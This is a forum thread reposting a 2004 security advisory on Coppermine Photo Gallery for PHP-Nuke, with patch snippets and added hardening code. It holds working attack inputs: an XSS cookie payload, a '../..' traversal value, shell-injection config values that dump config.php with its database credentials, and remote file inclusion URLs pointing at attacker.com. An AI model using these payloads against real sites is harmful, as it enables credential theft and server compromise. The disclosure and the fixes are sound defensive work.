Coppermine 1.2x security exploits

DJMaze
Webmaster
Joined: Apr 16, 2004
Posts: 14
Location: Netherlands
Posted: 01.05.2004 17:33
Subject: Coppermine 1.2x security exploits

Most of this is accessible through a hacked admin account.
Since CPG-Nuke has a secure admin it is hard to break in, but when they get in you could lose everything, so read.

Thanks to Maku for notifying

{================================================================================}
{ [waraxe-2004-SA#026] }
{================================================================================}
{ }
{ [ Multiple vulnerabilities in Coppermine Photo Gallery for PhpNuke ] }
{ }
{================================================================================}

Author: Janek Vind "waraxe"
Date: 29. April 2004
Location: Estonia, Tartu
Web: www.waraxe.us/index.ph...&id=26


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Coppermine Photo Gallery 1.2.2b for CMS
Copyright (C) 2002,2003 Grégory DEMAR <gdemar@wanadoo.fr>
www.chezgreg.net/coppermine/
Updated by the Coppermine Dev Team coppermine.sf.net/team/
New Port by GoldenTroll
coppermine.findhere.org/
Based on coppermine 1.1d by Surf www.surf4all.net/
coppermine.findhere.org

I have tested two versions of Coppermine: 1.2.2b and 1.2.0 RC4, which I will name
further as "new version" and "old version".


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full path disclosure:

Many scripts in the Coppermine software package are not protected against direct access,
therefore standard PHP error messages can be provoked, which leads to exposure of the full
path to the scripts. Such a piece of information has great value for a potential attacker, who
will use it in the next steps of hacking.

Version scope: both new and old versions are affected.

Examples:

localhost/nuke72/modul...hpinfo.php
localhost/nuke72/modul...addpic.php
localhost/nuke72/modul...config.php
localhost/nuke72/modul..._input.php
localhost/nuke72/modul...yecard.php
localhost/nuke72/modul.../ecard.php
localhost/nuke72/modul...op.inc.php
FIXES: Add a die() line (it seems they got lost along the way after a merge of the standalone and CMS versions):

phpinfo.php
PHP:
if (!defined('IN_COPPERMINE')) die();   // guard goes at the top, before the first function
function cpgGetPhpinfoConf($search)

addpic.php
PHP:
// direct requests arrive with "modules/" in the script path; only the CMS front controller may load this file
if (eregi("modules/", $_SERVER['PHP_SELF'])) {
    die("You can't access this file directly...");
}
define('ADDPIC_PHP', true);
define('NO_HEADER', true);
require("modules/" . $name . "/include/load.inc.php");

config.php
PHP:
if (eregi("modules/", $_SERVER['PHP_SELF'])) {
    die("You can't access this file directly...");
}
define('CONFIG_PHP', true);
require("modules/" . $name . "/include/load.inc.php");

db_input.php
PHP:
if (eregi("modules/", $_SERVER['PHP_SELF'])) {
    die("You can't access this file directly...");
}
define('DB_INPUT_PHP', true);
require("modules/" . $name . "/include/load.inc.php");

displayecard.php
PHP:
if (eregi("modules/", $_SERVER['PHP_SELF'])) {
    die("You can't access this file directly...");
}
define('DISPLAYECARD_PHP', true);
require("modules/" . $name . "/include/load.inc.php");

ecard.php
PHP:
if (eregi("modules/", $_SERVER['PHP_SELF'])) {
    die("You can't access this file directly...");
}
define('ECARDS_PHP', true);
require("modules/" . $name . "/include/load.inc.php");

include/crop.inc.php
PHP:
if (!defined('IN_COPPERMINE')) die('Not in Coppermine...');
// ////////////////// Variables //////////////////////////////
// used texts
$txt['bigger'] = ">";

B. Cross-site scripting aka XSS:

Can be used by a potential attacker for stealing cookies and doing other operations which, under
normal conditions, are not permitted by the browser's cross-domain security restrictions.

Version scope: only new version is affected.

Examples:

localhost/nuke72/modul...URL=foobar">[xss code here]
localhost/nuke72/modul...URL=foobar"><body%20onload=alert(document.cookie);>

FIX: REMOVE menu.inc.php
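The two example URLs above break out of a double-quoted attribute with `">`. As an added example, not code from menu.inc.php or from Coppermine, here is that pattern in miniature: a request parameter reflected into an href, first verbatim and then escaped. The function names and the sample value are constructed for this illustration.

```php
<?php
// Added example, not Coppermine code: a request parameter reflected into an
// HTML attribute, unescaped and escaped. Function names are hypothetical.

function render_back_link_vulnerable($url)
{
    // The value lands inside a double-quoted attribute verbatim. A '"' in the
    // parameter closes the attribute and the rest of the value becomes markup.
    return '<a href="' . $url . '">back</a>';
}

function render_back_link_fixed($url)
{
    // Only same-site, relative targets are accepted for a "back" link; this also
    // rules out javascript: and protocol-relative (//host) URLs.
    if (!is_string($url) || $url === '' || $url[0] !== '/' || substr($url, 0, 2) === '//') {
        $url = '/';
    }
    // ENT_QUOTES turns " ' < > & into entities, so the value cannot leave the attribute.
    return '<a href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">back</a>';
}

// Constructed input, modelled on the advisory's second example URL.
$payload = 'foobar"><body onload=alert(document.cookie);>';

// The vulnerable form emits the payload as markup; the fixed form keeps it inside the attribute.
echo render_back_link_vulnerable($payload), "\n";
echo render_back_link_fixed('/modules/coppermine/' . $payload), "\n";
```

The fixed variant does two independent things: the scheme check decides which values are acceptable at all, and htmlspecialchars() decides how an accepted value is written into the page. Dropping either one reopens a different hole, so both belong in the output path.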

C. Arbitrary directory browsing (needs nuke admin rights!):

PhpNuke is known for its many security bugs, leading to admin account takeover by an attacker.
So needing admin rights to use this exploit is not such a big restriction ...

Version scope: both new and old versions are affected.

Example:

localhost/nuke72/modul...tdir=../..

... and we can see PhpNuke's root directory structure
searchnew.php
PHP:
function getallpicindb(&$pic_array, $startdir)
{
    global $CONFIG;
    // Reject any ".." in the admin-supplied start directory so it cannot climb out of
    // the albums tree -- thanks to waraxe for finding this admin vulnerability.
    // (A regex check such as ereg('..', ...) treats '.' as a wildcard and would match
    // any two characters, so a literal substring test is used instead.)
    if (strpos($startdir, '..') !== false) die('Access denied');
    $sql = "SELECT filepath, filename "
         . "FROM {$CONFIG['TABLE_PICTURES']} "
         . "WHERE filepath LIKE '$startdir%'";
    $result = db_query($sql);
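The fix above rejects a literal ".." in $startdir. An added example, not part of DJMaze's patch or of Coppermine, that goes one step further and confines the admin-supplied start directory to the albums tree by resolving it with realpath() and checking the prefix, so a symlinked or otherwise indirect detour fails the same way as "../..". confine_startdir() and the temporary directory layout in the demo are assumptions.

```php
<?php
// Added example, not Coppermine's searchnew.php: confine an admin-supplied
// $startdir to the gallery's albums directory by resolving it and checking the
// prefix, instead of only rejecting the literal "..". Names are hypothetical.

function confine_startdir($startdir, $albums_root)
{
    $root = realpath($albums_root);
    if ($root === false || !is_dir($root)) {
        return false;
    }
    $root = rtrim($root, '/\\') . DIRECTORY_SEPARATOR;

    // A null byte would truncate the path in older PHP builds; refuse it outright.
    if (!is_string($startdir) || strpos($startdir, "\0") !== false) {
        return false;
    }

    // realpath() collapses "." and ".." segments and follows symlinks, so the
    // result is the directory the filesystem would actually open.
    $target = realpath($root . ltrim($startdir, '/\\'));
    if ($target === false || !is_dir($target)) {
        return false;
    }
    $target = rtrim($target, '/\\') . DIRECTORY_SEPARATOR;

    // Anything that resolved outside the albums tree (e.g. "../..") is rejected.
    if (strncmp($target, $root, strlen($root)) !== 0) {
        return false;
    }
    // Return the path relative to the root, as the LIKE clause expects
    // ("" means the albums root itself).
    return substr($target, strlen($root));
}

// Constructed demo: a throw-away albums tree under the system temp directory.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'cpg_demo_' . getmypid();
mkdir($base . '/albums/userpics', 0700, true);

var_dump(confine_startdir('userpics', $base . '/albums'));               // inside: accepted
var_dump(confine_startdir('../..', $base . '/albums'));                  // climbs out: false
var_dump(confine_startdir('userpics/../../albums', $base . '/albums'));  // resolves to root: accepted

rmdir($base . '/albums/userpics');
rmdir($base . '/albums');
rmdir($base);
```

Callers must compare the result with `false` using `===`, because the albums root itself legitimately comes back as the empty string. The prefix test only works because both sides were passed through realpath(); comparing the raw request value against the root would be fooled by the same ".." sequences the page describes.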

D. Execution of arbitrary shell commands on the server (needs nuke admin rights!):

Yes, again we need PhpNuke admin privileges to accomplish this exploit, but as said before,
there are many ways to compromise nuke's admin account.

Version scope: both new and old versions are affected.

So, how can we give shell commands to the server?
Let's look at Coppermine's original source in "coppermine/include/picmgmtbatch.inc.php":


// Method for thumbnails creation
switch ($method) {
    case "im" :
        if (preg_match("#[A-Z]:|\\\\#Ai", __FILE__)) {
            // get the basedir, remove '/include'
            $cur_dir = "";
            $src_file = '"' . strtr($src_file, '/', '\\') . '"';
            $im_dest_file = str_replace('%', '%%', ('"' . strtr($dest_file, '/', '\\') . '"'));
        } else {
            $src_file = escapeshellarg($src_file);
            $im_dest_file = str_replace('%', '%%', escapeshellarg($dest_file));
        }

        $output = array();
        $cmd = "{$CONFIG['impath']}convert -quality {$CONFIG['jpeg_qual']} {$CONFIG['im_options']} -geometry {$destWidth}x{$destHeight} $src_file $im_dest_file";

        //die("$cmd");

        exec ($cmd, $output, $retval);

        if ($retval) {
            $ERROR = "Error executing ImageMagick - Return value: $retval";
            if ($CONFIG['debug_mode']) {

As we can see, the very dangerous PHP function "exec()" is in use, and some user input -
the variables "$src_file" and "$dest_file" - is sanitized by "escapeshellarg()". All seems to be ok?
Yes... oops... what about the config variables "$CONFIG['impath']", "$CONFIG['jpeg_qual']" etc.?
Coppermine's authors were assuming that those variables are safe to use directly in "exec()"...
But if we have nuke admin rights, we can manipulate those configuration parameters and therefore
various shell commands can be injected into "exec()"!
You want details? Go to Coppermine's configuration panel and set "Method for resizing images" to
"Image Magick". Next set "Path to ImageMagick" to a value which includes the shell command you want to execute on the server.
Example "path" in case of a Windows server: "type config.php > config.txt &" ,
Linux server: "cat config.php > config.txt ;" .
Now "save new configuration", then upload some pictures to the server and go to "Batch add pictures".
And if all went right, then you will see a "config.txt" file in the phpnuke root directory, so anyone can
see in plaintext information of critical value - database name, username and password.
Of course, a skilled attacker can within 5 minutes get a remote shell running on the server through an
arbitrary port (higher than 1024) and the next hacking is not logged anymore, because the webserver is bypassed.
One more step - finding and using a local r00t exploit - and the server is 0wned

include/picmgmt.inc.php AND include/picmgmtbatch.inc.php
PHP:
// try to get more memory for executing large pictures -> DJMaze
ini_set("memory_limit", "32M");
// Method for thumbnails creation
$CONFIG['jpeg_qual'] = escapeshellarg($CONFIG['jpeg_qual']);
$CONFIG['im_options'] = escapeshellarg($CONFIG['im_options']);
switch ($method) {
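The fix above quotes $CONFIG['jpeg_qual'] and $CONFIG['im_options'] with escapeshellarg(); $CONFIG['impath'], the value the advisory uses for its example, still reaches the command string unquoted. As an added example, not DJMaze's patch and not Coppermine's own code, this builds the same convert command so that every configuration value is either validated (the binary path), cast (quality and geometry) or quoted (everything else). build_convert_cmd() and the $config keys are assumptions taken from the snippet above.

```php
<?php
// Added example, not Coppermine's picmgmtbatch.inc.php: build the ImageMagick
// command so that no $CONFIG value can inject shell syntax. The binary path is
// trusted only after it resolves to an executable named convert(.exe).
// build_convert_cmd() and the $config keys used here are assumptions.

function build_convert_cmd(array $config, $src_file, $dest_file, $destWidth, $destHeight)
{
    // 1. The configured path must resolve to a real executable called convert(.exe).
    //    A value like "cat config.php > config.txt ;" is not a directory, so realpath() fails.
    $dir = rtrim($config['impath'], '/\\');
    $convert = false;
    foreach (array('convert', 'convert.exe') as $name) {
        $candidate = realpath($dir . DIRECTORY_SEPARATOR . $name);
        if ($candidate !== false && is_file($candidate) && is_executable($candidate)) {
            $convert = $candidate;
            break;
        }
    }
    if ($convert === false) {
        throw new RuntimeException('impath does not point at an ImageMagick convert binary');
    }

    // 2. Numeric settings are cast and range-checked; an integer cannot carry metacharacters.
    $quality = (int) $config['jpeg_qual'];
    if ($quality < 1 || $quality > 100) {
        $quality = 85;
    }
    $geometry = (int) $destWidth . 'x' . (int) $destHeight;

    // 3. Free-form im_options is split into tokens; each token must be a plain option
    //    word or simple value. Anything else (";", "|", ">", quotes) is dropped.
    $options = array();
    foreach (preg_split('/\s+/', trim($config['im_options'])) as $token) {
        if ($token !== '' && preg_match('/^-?[A-Za-z0-9_.:+-]+$/', $token)) {
            $options[] = escapeshellarg($token);
        }
    }

    // 4. Every argument, including the binary path, is quoted with escapeshellarg().
    $argv = array_merge(
        array(escapeshellarg($convert), '-quality', escapeshellarg((string) $quality)),
        $options,
        array('-geometry', escapeshellarg($geometry),
              escapeshellarg($src_file), escapeshellarg($dest_file))
    );
    return implode(' ', $argv);
}

// Constructed demo: the advisory's injection value is refused; a real path is accepted.
$bad = array('impath' => 'cat config.php > config.txt ;', 'jpeg_qual' => '80', 'im_options' => '');
try {
    build_convert_cmd($bad, 'a.jpg', 'thumb_a.jpg', 100, 100);
} catch (RuntimeException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}

// Hostile values in the other settings are neutralised rather than refused.
$good = array('impath' => '/usr/bin/', 'jpeg_qual' => '80; id', 'im_options' => '-antialias ; cat config.php');
if (is_executable('/usr/bin/convert')) {
    echo build_convert_cmd($good, 'a.jpg', 'thumb a.jpg', 100, 100), "\n";
}
```

The returned string is what the original code passes to exec($cmd, $output, $retval). On PHP 7.4 and later, handing proc_open() an argument array instead of a string avoids the shell entirely, which makes the quoting step unnecessary; the path validation and the integer casts stay useful either way, because they also stop a wrong binary or an absurd quality value from being run.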

E. Remote file inclusion:

Version scope: both new and old versions are affected (different bugs in different scripts).

There exist remote file inclusion vulnerabilities in Coppermine Photo Gallery which
can lead to arbitrary PHP code parsing, shell command injection, etc. And as discussed before,
this can finally lead to total compromise of the victim server.

E1 - the old version is affected:

First get your PHP script ready in "http://attacker.com/include/functions.inc.php" and then:

localhost/nuke69j1/mod...tacker.com



E2 - the new version is affected:

First get your PHP script ready in "http://attacker.com/user_list_info_box.inc" and then:

localhost/nuke72/modul...tacker.com
localhost/nuke72/modul...tacker.com
localhost/nuke72/modul...tacker.com

Of course, the attacker's server, where those scripts are, must NOT PARSE PHP!!

See ya!

Open your theme.php:
PHP:
/* (at your option) any later version.                                      */
/****************************************************************************/
/* $Id: theme.php,v 1.6 2004/04/08 08:23:42 gtroll Exp $ */
/****************************************************************************/
if (!defined('IN_COPPERMINE')) die('Not in Coppermine...');
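The die() guard above stops theme.php from being requested directly; the inclusion bug in section E is the reverse case, a script whose include path is built from a request value. As an added example, not Coppermine's theme.php and not DJMaze's patch, this resolves a theme name against the directories that exist locally before anything is required, so a value such as "http://attacker.com" never becomes an include path. resolve_theme_file(), the $themes_dir/<name>/theme.php layout and the demo directory are assumptions.

```php
<?php
// Added example, not Coppermine's theme.php: resolve a theme name taken from the
// request against the directories that actually exist locally, instead of
// interpolating the value into require(). resolve_theme_file() and the
// directory layout ($themes_dir/<name>/theme.php) are assumptions.

function resolve_theme_file($name, $themes_dir)
{
    // Only a plain directory name is acceptable: this rules out "http://attacker.com",
    // "../", null bytes and anything else that could redirect the include.
    if (!is_string($name) || !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $name)) {
        return false;
    }
    // The allowlist is whatever sits on disk under the themes directory; the
    // request cannot add entries to it.
    $allowed = array();
    foreach (scandir($themes_dir) as $entry) {
        if ($entry[0] !== '.' && is_dir($themes_dir . '/' . $entry)) {
            $allowed[] = $entry;
        }
    }
    if (!in_array($name, $allowed, true)) {
        return false;
    }
    $file = $themes_dir . '/' . $name . '/theme.php';
    return is_file($file) ? $file : false;
}

// Constructed demo with a throw-away themes directory.
$themes = sys_get_temp_dir() . '/cpg_theme_demo_' . getmypid();
mkdir($themes . '/classic', 0700, true);
file_put_contents($themes . '/classic/theme.php', "<?php\n// demo theme\n");

var_dump(resolve_theme_file('classic', $themes));              // local theme: accepted
var_dump(resolve_theme_file('http://attacker.com', $themes));  // remote URL: false
var_dump(resolve_theme_file('../../config', $themes));         // traversal: false

// Typical use at the include site (the 'theme' parameter name is an assumption):
// $file = resolve_theme_file($_GET['theme'], $themes);
// if ($file !== false) require($file);

unlink($themes . '/classic/theme.php');
rmdir($themes . '/classic');
rmdir($themes);
```

Alongside the allowlist, setting allow_url_fopen = Off (and, from PHP 5.2 on, allow_url_include = Off) in php.ini closes the remote-inclusion path at the interpreter level, which matters for any script the allowlist does not cover.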

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!
Special greets to www.gamecheaters.us staff!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe @ yahoo.com
Janek Vind "waraxe"

Homepage: www.waraxe.us/


clubhouse
Special-Agent
Joined: Nov 04, 2004
Posts: 478
Location: An island with 2 mountains
Posted: 08.03.2005 17:16
Subject: Re: Coppermine 1.2x security exploits

Who is supposed to get through all that so quickly?

Ertan
Webmaster
Joined: Mar 19, 2004
Posts: 1264
Location: Germany
Posted: 08.03.2005 17:43
Subject: Re: Coppermine 1.2x security exploits

"stop this !!!!!!!!!!!"
Now you will probably get even fewer answers here
